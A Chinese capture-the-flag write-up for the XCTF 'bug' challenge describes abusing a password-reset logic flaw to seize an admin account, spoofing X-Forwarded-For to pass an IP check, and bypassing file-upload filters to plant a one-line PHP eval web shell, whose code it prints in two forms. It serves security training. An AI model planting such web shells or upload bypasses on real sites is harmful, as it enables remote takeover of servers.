XCTF-高手进阶区:bug

题目:
在这里插入图片描述
进去后发现如下所示:
在这里插入图片描述
我注册了一个peak账号,登录后显示如下:
在这里插入图片描述
经过一番测试,发现Manage需要admin权限:
在这里插入图片描述
如何获取admin权限呢?利用修改密码界面的逻辑漏洞,修改admin的密码,如下:
在这里插入图片描述
再次点击Manage会出现
在这里插入图片描述
我们使用XFF绕过IP限制
X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP
在这里插入图片描述

<!--index.php?module=filemanage&do=???-->
这个明显是让我们猜,这里最后根据前面filemanage(文件管理),猜到upload(上传)

在这里插入图片描述
尝试上传一个peak.php文件:<?php @eval($_REQUEST[peak]);?>
在这里插入图片描述
发现无法上传,被判断为php文件,通过在上传时可以抓包,可以发现是后端验证,尝试00截断:
在这里插入图片描述
再猜测可能是过滤代码中的特殊字符,例如?,那我们将peak.php内容修改为:<script language="php">@eval($_REQUEST[peak])</script>,再次上传,00截断也不ok,依旧未果,还能咋办?
最后发现php4和php5可以上传但返回不是图像…好!那我们就修改MIME
在这里插入图片描述
修改文件名为peak.jpg,结果不行!那就是peak.php的内容有问题,目标服务器有过滤,那我们继续使用<script language="php">@eval($_REQUEST[peak])</script>来绕过,得到flag
在这里插入图片描述


注:经测试
(1)如果你的peak.php5文件内容中没有任何php内容还不行,例:
在这里插入图片描述
(2)文件必须能被php解析执行
在这里插入图片描述

总结:这题主要考查

  • 对逻辑漏洞的认识
  • 对敏感目录的猜测
  • 文件上传的绕过(需要注意的是,有时候常用的一句话木马,有可能会被过滤!)
  • 绕过要求:MIME类型是图片;文件名能被php解析执行;文件内容既要是php文件,而且你php文件中的内容还不能这么明显,难搞哦
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值